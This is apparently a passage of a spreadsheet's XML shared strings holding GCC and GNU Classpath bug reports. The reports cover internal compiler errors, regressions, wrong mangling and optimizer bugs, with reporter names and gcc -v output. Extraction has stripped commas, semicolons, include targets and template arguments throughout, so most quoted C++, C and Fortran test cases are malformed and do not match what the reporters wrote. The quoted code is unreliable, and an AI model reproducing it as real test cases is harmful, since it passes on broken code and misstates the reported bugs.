t1.o:(.bss+0x20): first defined here
t2.o:(.bss+0x21): multiple definition of `std::tr1::placeholders::(anonymous namespace)::_9'
t1.o:(.bss+0x21): first defined here
t2.o:(.bss+0x22): multiple definition of `std::tr1::placeholders::(anonymous namespace)::_8'
t1.o:(.bss+0x22): first defined here
t2.o:(.bss+0x23): multiple definition of `std::tr1::placeholders::(anonymous namespace)::_7'
t1.o:(.bss+0x23): first defined here
t2.o:(.bss+0x24): multiple definition of `std::tr1::placeholders::(anonymous namespace)::_6'
t1.o:(.bss+0x24): first defined here
t2.o:(.bss+0x25): multiple definition of `std::tr1::placeholders::(anonymous namespace)::_5'
t1.o:(.bss+0x25): first defined here
t2.o:(.bss+0x26): multiple definition of `std::tr1::placeholders::(anonymous namespace)::_4'
t1.o:(.bss+0x26): first defined here
t2.o:(.bss+0x27): multiple definition of `std::tr1::placeholders::(anonymous namespace)::_3'
t1.o:(.bss+0x27): first defined here
t2.o:(.bss+0x28): multiple definition of `std::tr1::placeholders::(anonymous namespace)::_2'
t1.o:(.bss+0x28): first defined here
t2.o:(.bss+0x29): multiple definition of `std::tr1::placeholders::(anonymous namespace)::_1'
t1.o:(.bss+0x29): first defined here
t2.o:(.bss+0x2a): multiple definition of `std::tr1::(anonymous namespace)::ignore'
t1.o:(.bss+0x2a): first defined here
t2.o:(.data+0x0): multiple definition of `_ZN8Internal1XIXT_EE8n_primesE'
t1.o:(.data+0x0): first defined here
==========
Thus preventing use of two unordered_map's in a single application.
g++ -v:
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++javaf95objcadatreelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.0 --enable-__cxa_atexit --enable-libstdcxx-allocator=mt --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-gc=boehm --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.0-1.4.2.0/jre --enable-mpfr --disable-werror --enable-checking=release i486-linux-gnu
Thread model: posix
gcc version 4.0.2 (Debian 4.0.2-2)</t>
  </si>
  <si>
    <t>maarten.keijzer</t>
  </si>
  <si>
    <t>GCC-60044</t>
  </si>
  <si>
    <t>Template argument of alias template not evaluated</t>
  </si>
  <si>
    <t>$ cat test.cc
#include 
template 
using Void = void
template 
struct Foo {
  const char* value = primary template
}
template 
struct Foo&gt; {
  const char* value = specialization
}
int main() {
  puts(Foo().value)
}
$ g++ -std=c++11 test.cc &amp;&amp; ./a.out
specialization
Expected output:
primary template</t>
  </si>
  <si>
    <t>roman.perepelitsa</t>
  </si>
  <si>
    <t>GCC-50391</t>
  </si>
  <si>
    <t>[C++0x] ICE on invalid code pair with incomplete type</t>
  </si>
  <si>
    <t>This code produces an internal compile error:
compile with g++ --std=gnu++0x
#include 
class Blob
void
foo(Blob *b)
{
  auto p = std::make_pair(1 *b)
}
I'm using the latest svn version.
gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/jarrydb/current/soft/install-latest/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /home/jarrydb/current/soft/src/gcc-git/configure --prefix=/home/jarrydb/current/soft/install-latest --disable-multilib --enable-languages=cc++ : (reconfigured) /home/jarrydb/current/soft/src/gcc-git/configure --prefix=/home/jarrydb/current/soft/install-latest --disable-multilib --enable-languages=cc++ : (reconfigured) /home/jarrydb/current/soft/src/gcc-git/configure --prefix=/home/jarrydb/current/soft/install-latest --disable-multilib --enable-languages=cc++
Thread model: posix
gcc version 4.7.0 20110913 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-38705</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE: canonical types differ for identical types const int and const AlpsNodeIndex_t</t>
  </si>
  <si>
    <t>I turfed up an ICE with optimization but the thing compiled fine without.  To reproduce use the soon-to-be attached source and do:
madison.gams.com:/home/steve/lang/cpp/alpsBug$g++ -c AlpsTreeNode.ii 
madison.gams.com:/home/steve/lang/cpp/alpsBug$g++ -O3 -c AlpsTreeNode.ii 
AlpsTreeNode.cpp: In member function 'AlpsReturnStatus AlpsTreeNode::encodeAlps(AlpsEncoded*) const':
AlpsTreeNode.cpp:144: internal compiler error: canonical types differ for identical types const int and const AlpsNodeIndex_t
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I was using the trunk src at rev 142984:
$gcc -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --prefix=/usr/local2 --enable-languages=cc++fortran
Thread model: posix
gcc version 4.4.0 20081231 (experimental) (GCC)</t>
  </si>
  <si>
    <t>sdirkse</t>
  </si>
  <si>
    <t>GCC-51322</t>
  </si>
  <si>
    <t>[C++11] wrong mangling with argument packs</t>
  </si>
  <si>
    <t>template struct Ident { typedef T type }
templateclass Eclass...F&gt; struct A{typedef E type}
typedef A B
void f(B){}
compiled with g++ -std=c++0x -c mangles f as _Z1f1AI5IdentIiEE that is f(A &gt;). Note that if I make E a templateclass (no ellipsis) the compiler crashes instead (whereas 4.6 used to give a sorry). clang mangles it as _Z1f1AI5IdentJiEE which AFAICT looks ok.</t>
  </si>
  <si>
    <t>GCC-1490</t>
  </si>
  <si>
    <t>gcc's invaild option : -mno-486</t>
  </si>
  <si>
    <t>RedHat 5.x
Kernel 2.2.17
gcc can't compile with -mno-486 :
	gcc -mno-486 cfile
output:
	cc1: Invalid option `no-486'
gcc version
root@gyc#~&gt;gcc --version
2.95.2
first is mozilla
Mozilla(Netscape 5)
root@gyc#/usr/local/src/mozilla&gt;make 
...
cc1: Invalid option `no-486'
now a test source code
My HELLO code
root@gyc#~/c-code&gt;cat  hello.c
&gt; #include 
&gt; void main (void) { printf(Hello World\n) }
&gt; EOF
root@gyc#~/c-code&gt;ls
.  ..  hello.c
root@gyc#~/c-code&gt;gcc -mno-486 hello.c -o hello
cc1: Invalid option `no-486'
hello.c: In function `main':
hello.c:2: warning: return type of `main' is not `int'
root@gyc#~/c-code&gt;ls
.  ..  hello.c
now the test source code in http://www.codesourcery.com/gcc-compile.shtml
GCC Output
These are the results of processing your source code with the following command:
      gcc -mno-486 [input] 
Exit code: 256
Messages:
      cc1: Invalid option `no-486'
      /tmp/@31596.7.c: In function `main':
      /tmp/@31596.7.c:2: warning: return type of `main' is not `int'
Release:
2.95.2
Environment:
i586
RedHat 5.1
Kernel 2.2.17
How-To-Repeat:
      gcc -mno-486 [input]</t>
  </si>
  <si>
    <t>fsl</t>
  </si>
  <si>
    <t>GCC-3765</t>
  </si>
  <si>
    <t>member using declaration can't change access from public</t>
  </si>
  <si>
    <t>A C++ using declaration cannot be used to change member access from public to private or from public to protected.  (Other combinations seem to work correctly.)  This is a regression that occurred between egcs 1.1.2 and gcc 2.95.2 and still exists in gcc 3.0.  (The error message given on the occasions where the |using| declaration works correctly also doesn't make much sense since it gives the access that was overridden by the |using| even though it correctly changes the access.  But that's another bug.)
This is useful for things such as ensuring that users do not attempt to manually refcount an COM smart pointer:
http://lxr.mozilla.org/seamonkey/source/xpcom/base/nsCOMPtr.h#159
Release:
gcc 3.0
Environment:
Linux 2.2.14-5.0smp i686 (RedHat 6.2)
How-To-Repeat:
Try to compile test case #1 or #4.  Compilation succeds even though it should not.
Test case #1:
===========
/* vim:cindent:ai:sw=2:et:ts=8:tw=72:
 *
 * Demonstration of bug in gcc 3.0 where |using| does not change access
 * from public to private. 
 *
 * ILLEGAL EXAMPLE
 * Test of changing access from public to private.
 *
 * See C++ standard section 11.3 and 7.3.3.
 */
class A
{
  public:
    int foo() { return 1 }
}
class B : public A
{
  private:
    using A::foo
}
int main()
{
  B b
  return b.foo()   // Should not compile.
}
===========
Test case #2:
===========
/* vim:cindent:ai:sw=2:et:ts=8:tw=72:
 *
 * Demonstration of bug in gcc 3.0 where |using| does not change access
 * from public to private. 
 *
 * LEGAL EXAMPLE
 * Test of changing access from protected to public.
 *
 * See C++ standard section 11.3 and 7.3.3.
 */
class A
{
  protected:
    int foo() { return 0 }
}
class B : public A
{
  public:
    using A::foo
}
int main()
{
  B b
  return b.foo()
}
===========
Test case #3:
===========
/* vim:cindent:ai:sw=2:et:ts=8:tw=72:
 *
 * Demonstration of bug in gcc 3.0 where |using| does not change access
 * from public to private. 
 *
 * ILLEGAL EXAMPLE
 * Test of changing access from protected to private.
 *
 * See C++ standard section 11.3 and 7.3.3.
 */
class A
{
  protected:
    int foo() { return 1 }
}
class B : public A
{
  private:
  //protected:
    using A::foo
}
class C : public B
{
  public:
    C() { B::foo() }
}
int main()
{
  C c
  return 1
}
===========
Test case #4:
===========
/* vim:cindent:ai:sw=2:et:ts=8:tw=72:
 *
 * Demonstration of bug in gcc 3.0 where |using| does not change access
 * from public to private. 
 *
 * ILLEGAL EXAMPLE
 * Test of changing access from public to private.
 *
 * See C++ standard section 11.3 and 7.3.3.
 */
class A
{
  public:
    int foo() { return 1 }
}
class B : public A
{
  private:
    using A::foo
}
class C : public B
{
  public:
    C() { foo() }
}
int main()
{
  C c
  return 1
}
===========
Test case #5:
===========
/* vim:cindent:ai:sw=2:et:ts=8:tw=72:
 *
 * Demonstration of bug in gcc 3.0 where |using| does not change access
 * from public to private. 
 *
 * LEGAL EXAMPLE
 * Test of changing access from protected to public.
 *
 * See C++ standard section 11.3 and 7.3.3.
 */
class A
{
  protected:
    int foo() { return 0 }
}
class B : public A
{
  public:
    using A::foo
}
int main()
{
  B b
  return b.foo()
}
===========</t>
  </si>
  <si>
    <t>dbaron</t>
  </si>
  <si>
    <t>GCC-3913</t>
  </si>
  <si>
    <t>On Athlon's gcc 3.0 produces code running 1/2 as fast as gcc 2.95</t>
  </si>
  <si>
    <t>The new memory fetch scheduling algorithm reduces Athlon performance by a factor of 2 over the one used by gcc 2.95.x.  It also appears that the x87 register stack utilization algorithm  is worse than 2.95.x as well. 
Problem is too complex to reduce to 1 single preprocessed file.  The full problem is detailed (along with code to reproduce and assembler outputs) here: 
   http://www.cs.utk.edu/~rwhaley/ATLAS/gcc30.html
Release:
gcc version 3.0
Environment:
RedHat Linux 7.1 on a 1.2Ghz Athlon.  gcc -v gives:
hades. /usr/local/gcc-3.0/bin/gcc -v
Reading specs from /usr/local/gcc-3.0/lib/gcc-lib/i686-pc-linux-gnu/3.0/specs
Configured with: ./configure --prefix=/usr/local/gcc-3.0
Thread model: single
gcc version 3.0
How-To-Repeat:
 http://www.cs.utk.edu/~rwhaley/ATLAS/gcc30.html#dup</t>
  </si>
  <si>
    <t>rwhaley</t>
  </si>
  <si>
    <t>GCC-6496</t>
  </si>
  <si>
    <t>Sparc backend clobbers call-return stack of UltraSparc</t>
  </si>
  <si>
    <t>The Sparc backend peepholes for optimizing a
call followed by a jump should be disabled when
optimizing for UltraSPARC and later.
These optimizations corrupt the call-return stack
so that the end result is slower code not faster code.
Release:
GCC 3.1 CVS
Environment:
sparc*-*
How-To-Repeat:
Compile enclosed testcase with -O2 -mtune=ultrasparc
Look at assembly for add %o7 OFF %o7 in delay
slot of calls to 'bar'.</t>
  </si>
  <si>
    <t>GCC-78229</t>
  </si>
  <si>
    <t>[6/7 Regression]  ICE in redirect_eh_edge_1 at tree-eh.c:2305</t>
  </si>
  <si>
    <t>seen with gcc-6-branch 20161103 r241817 works with -O1 instead of -O2 test case extracted from blender 2.77:
$ g++ -mavx -mavx2 -mfma -mlzcnt -mbmi -mbmi2 -mf16c -c -O2 -fopenmp -fPIC -funsigned-char -fno-strict-aliasing -ffast-math kernel_avx2.ii
kernel_avx2.ii: In function 'void fn3()':
kernel_avx2.ii:8:6: internal compiler error: in redirect_eh_edge_1 at tree-eh.c:2305
 void fn3() {
      ^~~
Please submit a full bug report
with preprocessed source if appropriate.
$ cat kernel_avx2.ii
void a()
inline int b(int c) {
  int d = c
  return __builtin_ia32_tzcnt_u32(d)
}
struct e {}
int f g h
void fn3() {
  float j
  {
    e k
    while (h) {
      if (g == 0)
        continue
      int i = b(g)
      f = i
    }
    a()
  }
}</t>
  </si>
  <si>
    <t>GCC-699</t>
  </si>
  <si>
    <t>Specific Parse Error Causes Seg Fault</t>
  </si>
  <si>
    <t>My crappy IDE controller spits out a ` every few seconds if there isn't any input.
This happened at the beginning of a 'C' file I was working on and I didn't notice it.
When I compiled I always got the error messages included.
kills.c:1: parse error before ``'
In file included from /usr/include/bits/types.h:166
                 from /usr/include/stdio.h:41
                 from kills.c:4:
/usr/include/bits/pthreadtypes.h:48: parse error before `size_t'
/usr/include/bits/pthreadtypes.h:48: warning: no semicolon at end of struct or union
/usr/include/bits/pthreadtypes.h:51: parse error before `__stacksize'
/usr/include/bits/pthreadtypes.h:51: warning: data definition has no type or storage class
/usr/include/bits/pthreadtypes.h:52: warning: data definition has no type or storage class
In file included from /usr/include/_G_config.h:45
                 from /usr/include/libio.h:31
                 from /usr/include/stdio.h:70
                 from kills.c:4:
/usr/include/gconv.h:71: parse error before `size_t'
/usr/include/gconv.h:84: parse error before `size_t'
/usr/include/gconv.h:93: parse error before `size_t'
/usr/include/gconv.h:169: parse error before `size_t'
/usr/include/gconv.h:169: warning: no semicolon at end of struct or union
/usr/include/gconv.h:172: parse error before `}'
/usr/include/gconv.h:172: warning: data definition has no type or storage class
In file included from /usr/include/libio.h:31
                 from /usr/include/stdio.h:70
                 from kills.c:4:
/usr/include/_G_config.h:47: field `__cd' has incomplete type
/usr/include/_G_config.h:50: field `__cd' has incomplete type
/usr/include/_G_config.h:53: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions.
Release:
gcc version 2.96 20000731
Environment:
Red Hat Linux 7.0 Intel PIII 600 (Katmai) with 256 MB RAM
How-To-Repeat:
The attached file is what I found to be the bare minimum 
required to repeat this situation.  I know that it wouldn't 
compile anyway but even if you add a main with a hello 
world print statement it still happens.  Or if you include 
other libraries it still happens.</t>
  </si>
  <si>
    <t>jbnance</t>
  </si>
  <si>
    <t>GCC-9505</t>
  </si>
  <si>
    <t>time_get and time_put facets vs streams</t>
  </si>
  <si>
    <t>This is to keep track of some problems pointed out by Martin
Sebor on the libstdc++-v3 discussion list. See:
http://gcc.gnu.org/ml/libstdc++/2003-01/msg00364.html
http://gcc.gnu.org/ml/libstdc++/2003-01/msg00368.html
http://gcc.gnu.org/ml/libstdc++/2003-01/msg00370.html
Release:
All active branches
Environment:
x86 glibc2.3.1</t>
  </si>
  <si>
    <t>pcarlini</t>
  </si>
  <si>
    <t>GCC-55897</t>
  </si>
  <si>
    <t>[avr] Allocate __memx data to .progmemx.data</t>
  </si>
  <si>
    <t>Currently data in address space __memx is allocated to .progmem.data i.e. the same section as for __flash resp. progmem.  However there os no need that __memx goes onto the same section.
In order to support better data layout __memx should go in a different section than .progmem e.g. progmemx.</t>
  </si>
  <si>
    <t>GCC-65437</t>
  </si>
  <si>
    <t>acc_update_device and acc_update_self fail to initialize runtime.</t>
  </si>
  <si>
    <t>Both acc_update_device and acc_update_self fail to initialize the runtime through the common function update_dev_host (oacc-mem.c).</t>
  </si>
  <si>
    <t>tschwinge</t>
  </si>
  <si>
    <t>GCC-41106</t>
  </si>
  <si>
    <t>[F03] Procedure Pointers with CHARACTER results</t>
  </si>
  <si>
    <t>There are some problems with CHARACTER-valued procedure pointers (and procedure pointer components).
First example (with PPCs):
module m
 type :: t
 procedure(character(len=5)) pointer nopass :: ptr
 end type
contains
 function abc()
  character(len=5) :: abc
  abc = 'abcde'
 end function abc
end module m
use m
 type(t) :: x
 character(len=5) :: str
 x%ptr =&gt; abc
 str = x%ptr()
end
gives the error:
test.f90:12:0: internal compiler error: in gfc_conv_component_ref at
fortran/trans-expr.c:477
Second example (similar but with simple procedure pointers):
procedure(character(len=5)) pointer :: pp
pp =&gt; abc
contains
 function abc()
 character(len=5) :: abc
 abc = 'abcde'
 end function abc
end
gives:
internal compiler error: in gfc_trans_pointer_assignment at fortran/trans-expr.c:4237</t>
  </si>
  <si>
    <t>GCC-19403</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] name lookup is broken with friends</t>
  </si>
  <si>
    <t>Hi 
the following code doesn't compile: 
struct A {} 
namespace Boo 
{ 
struct B 
{ 
    friend struct A 
    B(const A 
} 
} 
int main() 
{ 
    A a 
    Boo::B b(a) 
    return 0 
} 
It compiles with g++ &lt; 4.0.</t>
  </si>
  <si>
    <t>Woebbeking</t>
  </si>
  <si>
    <t>GCC-13575</t>
  </si>
  <si>
    <t>ICE for wrong code</t>
  </si>
  <si>
    <t>The module 
      module AHFinder_dat 
      implicit none 
      save c0 
      end module AHFinder_dat 
leads to the error message 
$ ~/gcc-3.5-tree-ssa/bin/gfortran -x f95 -c bug.f 
bug.f:0: internal compiler error: in gfc_typenode_for_spec at fortran/
trans-types.c:307 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
The code is in error because the variable c0 is not declared. 
$ ~/gcc-3.5-tree-ssa/bin/gfortran -v 
Reading specs from /home/eschnett/gcc-3.5-tree-ssa/lib/gcc/
i686-pc-linux-gnu/3.5-tree-ssa/specs 
Configured with: ../gcc/configure --prefix=/home/eschnett/gcc-3.5-tree-ssa 
--enable-languages=cc++javafortran : (reconfigured) ../gcc/configure 
--prefix=/home/eschnett/gcc-3.5-tree-ssa --enable-languages=cc++f95 
Thread model: posix 
gcc version 3.5-tree-ssa 20040105 (merged 20040102)</t>
  </si>
  <si>
    <t>GCC-45959</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: tree code 'template_type_parm' is not supported in gimple streams with -flto/-fwhopr</t>
  </si>
  <si>
    <t>Created attachment 22011
testcase
Compiler output:
$ gcc -flto testcase.C
testcase.C:106:1: internal compiler error: tree code 'template_type_parm' is not supported in gimple streams
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r165241 - crash
r165220 - crash
r165152 - OK</t>
  </si>
  <si>
    <t>GCC-18667</t>
  </si>
  <si>
    <t>ice with --parm integer-share-limit=0</t>
  </si>
  <si>
    <t>cat /dev/null&gt;t.c
gcc t.c --parm integer-share-limit=0 
this gives a bus error.</t>
  </si>
  <si>
    <t>GCC-80966</t>
  </si>
  <si>
    <t>ICE with -fstack-limit-register and large frames</t>
  </si>
  <si>
    <t>Created attachment 41465
testcase (-O0 -fstack-limit-register=r14)
Eric Botcazou reports a bug with -fstack-limit-register with large frames.
Testcase attached (needs -O0 -fstack-limit-register=r14).</t>
  </si>
  <si>
    <t>GCC-60555</t>
  </si>
  <si>
    <t>std::system_category().default_error_condition() doesn't map system errno values to std::generic_category()</t>
  </si>
  <si>
    <t>Created attachment 32376
Program that exposes the bug.
According to the C++ standard if the value ev corresponds to the POSIX errno value posv then std::system_category().default_error_condition(ev) should return std::error_condition(posv generic_category()). The libstdc++ implementation doesn't do this. Instead it always returns std::error_condition(ev std::system_category()).
Attached is a program that exposes this bug. I've seen this problem on 4.7.2 but an inspection of the source code for 4.8.2 suggests the bug exists for that version too.</t>
  </si>
  <si>
    <t>c.m.brandenburg</t>
  </si>
  <si>
    <t>CLASSPATH-24904</t>
  </si>
  <si>
    <t>JSplitPanes show a magic Button when one of the components is null</t>
  </si>
  <si>
    <t>The testcase pasted below shows that showing a JSplitPane that was initialized with one component being null magically makes a JButton with the label left button appear as that component.  This does not happen with the JDK.  Perhaps it needs to be hidden (ie size of 0).
***TESTCASE***
import java.awt.*
import javax.swing.*
public class G3 extends JComponent 
{
  public void paintComponent( Graphics g ) {
    g.setColor( new Color( 0xe0 0xe0 0xf0 ))
    g.fillRect( 0 0 400 400 )    
  }  
  public Dimension getPreferredSize() {
    return new Dimension(400400)
    }
  public static void main( String args[] ) {
    JFrame frame = new JFrame( layout tests )
    G3 gc1 = new G3()
    JScrollPane sp1 = new JScrollPane( gc1 )
    JSplitPane splitPane = new 
      JSplitPane(JSplitPane.HORIZONTAL_SPLIT false null sp1 )
    frame.getContentPane().add( Center splitPane )
    frame.pack()
    frame.show()
  }
}</t>
  </si>
  <si>
    <t>GCC-34099</t>
  </si>
  <si>
    <t>[4.3 Regression] optimizer problem</t>
  </si>
  <si>
    <t>Platform:
  Fedora release 7 (Moonshine)
  Linux idle.lbl.gov 2.6.22.9-91.fc7 #1 SMP Thu Sep 27 20:47:39 EDT 2007 x86_64
x86_64 x86_64 GNU/Linux
% g++ -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: /net/rosie/scratch2/rwgk/gcc_trunk/configure
--prefix=/net/cci-filer1/vol1/tmp/rwgk/gcc_trunk_130159_x86_64_fc7
--enable-languages=cc++fortran --with-mpfr=/usr
Thread model: posix
gcc version 4.3.0 20071113 (experimental) (GCC)
I'll attach a small reproducer.
It works with -O0:
% g++ -O0 -Wall multiply_bug.cpp -fno-strict-aliasing &amp;&amp; ./a.out
(74)
But doesn't with -O1 or higher:
% g++ -O1 -Wall multiply_bug.cpp -fno-strict-aliasing &amp;&amp; ./a.out
(00)
The reproducer #includes complex. I'm guessing it wouldn't be
hard to reduce the reproducer if necessary.
Ralf</t>
  </si>
  <si>
    <t>GCC-5538</t>
  </si>
  <si>
    <t>c++ internal compiler error in subst_stack_regs_pat at reg-stack.c: 1397</t>
  </si>
  <si>
    <t xml:space="preserve">	[roel@fs2 src]$ /usr/local/mpich/1.2.1..7/gm-1.5_Linux-2.4.9-13.smp/smp/gnu/rsh/bin/mpiCC -O3 -fomit-frame-pointer -O3 -fomit-frame-pointer -I/home1/roel/Coral/Geometric/include -I/home1/roel/Coral/Geometric/include -I/home1/roel/PQP_v1.1/include -c lbgk.cc
lbgk.cc: In member function `double LBGK::StopTracerInformationSlave()':
lbgk.cc:1221: Internal compiler error in subst_stack_regs_pat at reg-stack.c:
   1397
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The code compiles correctly on gcc version 2.95.2 20000220 (Debian GNU/Linux)
Release:
3.0.3
Environment:
System: Linux fs2.das2.nikhef.nl 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure</t>
  </si>
  <si>
    <t>roel</t>
  </si>
  <si>
    <t>GCC-79692</t>
  </si>
  <si>
    <t>[7 Regression] -Wformat-overflow false positive with unknown width</t>
  </si>
  <si>
    <t>Created attachment 40820
testcase
With trunk r245678 on x86_64 the attached testcase prints these warnings:
gcc-trunk -Wformat-overflow -O2 -c test-sprintf-2.c 
test-sprintf-2.c: In function 'test':
test-sprintf-2.c:90:32: warning: '%0*lX' directive writing between 1 and 2147483648 bytes into a region of size 76 [-Wformat-overflow=]
       sprintf (buffer 1: %s%c%0*lX %s%c%0*lX reg sFrom nFrom
                                ^~~~~
test-sprintf-2.c:90:24: note: directive argument in the range [0 4611686018427387904]
       sprintf (buffer 1: %s%c%0*lX %s%c%0*lX reg sFrom nFrom
                        ^~~~~~~~~~~~~~~~~~~~~~~~
test-sprintf-2.c:90:24: note: directive argument in the range [0 4611686018427387904]
test-sprintf-2.c:90:7: note: 'sprintf' output 9 or more bytes (assuming 4294967303) into a destination of size 80
       sprintf (buffer 1: %s%c%0*lX %s%c%0*lX reg sFrom nFrom
       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         (uint64_t) from reg sTo nTo (uint64_t) to)
         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
test-sprintf-2.c:109:29: warning: '%0*lX' directive writing between 1 and 2147483648 bytes into a region of size 76 [-Wformat-overflow=]
    sprintf (buffer 2: %s%c%0*lX %0*lX reg sFrom nFrom
                             ^~~~~
test-sprintf-2.c:109:21: note: directive argument in the range [0 4611686018427387904]
    sprintf (buffer 2: %s%c%0*lX %0*lX reg sFrom nFrom
                     ^~~~~~~~~~~~~~~~~~~~
test-sprintf-2.c:109:4: note: 'sprintf' output 8 or more bytes (assuming 2147483655) into a destination of size 80
    sprintf (buffer 2: %s%c%0*lX %0*lX reg sFrom nFrom
    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      (uint64_t) from nLen (uint64_t) len)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To me it seems it shouldn't warn. PR 79275 looks like a variant of this problem and was already fixed.</t>
  </si>
  <si>
    <t>GCC-67103</t>
  </si>
  <si>
    <t>[6 Regression]: gcc.target/i386/cmov2.c and gcc.target/i386/cmov3.c FAIL on x86</t>
  </si>
  <si>
    <t>Revision r226491 :
[RTL-ifcvt] Improve conditional select ops on immediates
	* ifcvt.c (noce_try_store_flag_constants): Make logic of the case
	when diff == STORE_FLAG_VALUE or diff == -STORE_FLAG_VALUE more
	explicit.  Prefer to add the flag whenever possible.
	(noce_process_if_block): Try noce_try_store_flag_constants before
	noce_try_cmove.
	* gcc.target/aarch64/csel_bfx_1.c: New test.
	* gcc.target/aarch64/csel_imms_inc_1.c: Likewise.
introduced following testsuite failures on x86:
FAIL: gcc.target/i386/cmov2.c scan-assembler sbb
FAIL: gcc.target/i386/cmov3.c scan-assembler cmov[^3]
The report and a discussion is at [1].
[1] https://gcc.gnu.org/ml/gcc-patches/2015-08/msg00056.html</t>
  </si>
  <si>
    <t>GCC-31445</t>
  </si>
  <si>
    <t>[4.3 regression] type_argument_pack not supported by dump_type</t>
  </si>
  <si>
    <t>More fallout from the variadic templates on mainline:
===========================================================
template  struct A
{
  void foo(T...)
  A(T... t) { foo(t) }
}
A a(0)
===========================================================
This is only a diagnostic problem in the second to last line:
bug.cc: In constructor 'A::A(T ...)':
bug.cc:4: error: parameter packs not expanded with `...':
bug.cc:4: note:         't'
bug.cc: In constructor 'A::A(T ...) [with T = int]':
bug.cc:7:   instantiated from here
bug.cc:4: error: no matching function for call to 'A::foo(#'type_argument_pack' not supported by dump_type#)'
bug.cc:3: note: candidates are: void A::foo(T ...) [with T = int]</t>
  </si>
  <si>
    <t>GCC-4438</t>
  </si>
  <si>
    <t>rect.c:370: Internal compiler error in change_address at emit-rtl.c:1635</t>
  </si>
  <si>
    <t>swanton% /home/dkossack/local/bin/gcc -v -save-temps -DHAVE_CONFIG_H -I. -I. -I../.. -DLOCALEDIR=\/home/dkossack/local/share/locale\ 	-I../..				-I../../intl			-I/home/dkossack/local/include/gtk-1.2 -I/home/dkossack/local/include/glib-1.2 -I/home/dkossack/local/lib/glib/include -I/usr/openwin/include				-I/home/dkossack/local/include  -DGTK_DISABLE_COMPAT_H  -O -Wall -c rect.c
Reading specs from /home/dkossack/local/lib/gcc-lib/sparc-sun-solaris2.7/3.0/specs
Configured with: ../gcc-3.0/configure --prefix=/home/dkossack/local --enable-threads=solaris --enable-version-specific-runtime-libs : (reconfigured) ../gcc-3.0/configure --prefix=/home/dkossack/local --enable-version-specific-runtime-libs
Thread model: posix
gcc version 3.0
GNU CPP version 3.0 (cpplib) (sparc)
ignoring nonexistent directory /home/dkossack/local/sparc-sun-solaris2.7/include
ignoring duplicate directory .
ignoring duplicate directory ../..
#include ... search starts here:
#include  search starts here:
 .
 ../..
 ../../intl
 /home/dkossack/local/include/gtk-1.2
 /home/dkossack/local/include/glib-1.2
 /home/dkossack/local/lib/glib/include
 /usr/openwin/include
 /home/dkossack/local/include
 /usr/local/include
 /home/dkossack/local/lib/gcc-lib/sparc-sun-solaris2.7/3.0/include
 /usr/include
End of search list.
 /home/dkossack/local/lib/gcc-lib/sparc-sun-solaris2.7/3.0/cc1 -fpreprocessed rect.i -quiet -dumpbase rect.c -O -Wall -version -o rect.s
GNU CPP version 3.0 (cpplib) (sparc)
GNU C version 3.0 (sparc-sun-solaris2.7)
	compiled by GNU C version 3.0.
rect.c: In function `render_rectangle':
rect.c:370: Internal compiler error in change_address at emit-rtl.c:1635
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
swanton%
Release:
GNU C version 3.0
Environment:
sparc-sun-solaris2.7
compiling gimp-1.2.2 plug-ins</t>
  </si>
  <si>
    <t>dkossack</t>
  </si>
  <si>
    <t>GCC-16277</t>
  </si>
  <si>
    <t>[4.0 regression] Wrong code with conditionals in initializers</t>
  </si>
  <si>
    <t>There is certainly nothing uninitialized in this code (unless 
possibly in std::vector which I haven't checked yet): 
----------------------------- 
#include  
struct D { 
    D (const std::vector  
    const std::vector a 
} 
D::D (const std::vector &amp;v) 
                : 
                a (v.size() == 0 ? std::vector () : v) 
{} 
----------------------- 
Yet I get this: 
parameter-estimation/libparest&gt; /home/bangerth/bin/gcc-3.5-pre/bin/c++ -O2 
-Wuninitialized -c x.cc 
x.cc: In constructor `D::D(const std::vector &gt;&amp;)': 
x.cc:11: warning: 'this.350' is used uninitialized in this function 
x.cc: In constructor `D::D(const std::vector &gt;&amp;)': 
x.cc:11: warning: 'this.350' is used uninitialized in this function 
Note also that the warning is indeed printed twice. 
W.</t>
  </si>
  <si>
    <t>GCC-21843</t>
  </si>
  <si>
    <t>[4.1 Regression] gcc.c-torture/execute/920501-2.c execution fails</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/execute/920501-2.c execution  -O1 
FAIL: gcc.c-torture/execute/920501-2.c execution  -O2 
FAIL: gcc.c-torture/execute/920501-2.c execution  -O3 -fomit-frame-pointer 
FAIL: gcc.c-torture/execute/920501-2.c execution  -O3 -fomit-frame-pointer
-funroll-loops 
FAIL: gcc.c-torture/execute/920501-2.c execution  -O3 -fomit-frame-pointer
-funroll-all-loops -finline-functions 
FAIL: gcc.c-torture/execute/920501-2.c execution  -O3 -g 
have appeared on mainline on i686-pc-linux-gnu between 20050530 and 20050531.  I
don't know what part of the compiler the bug might be in.</t>
  </si>
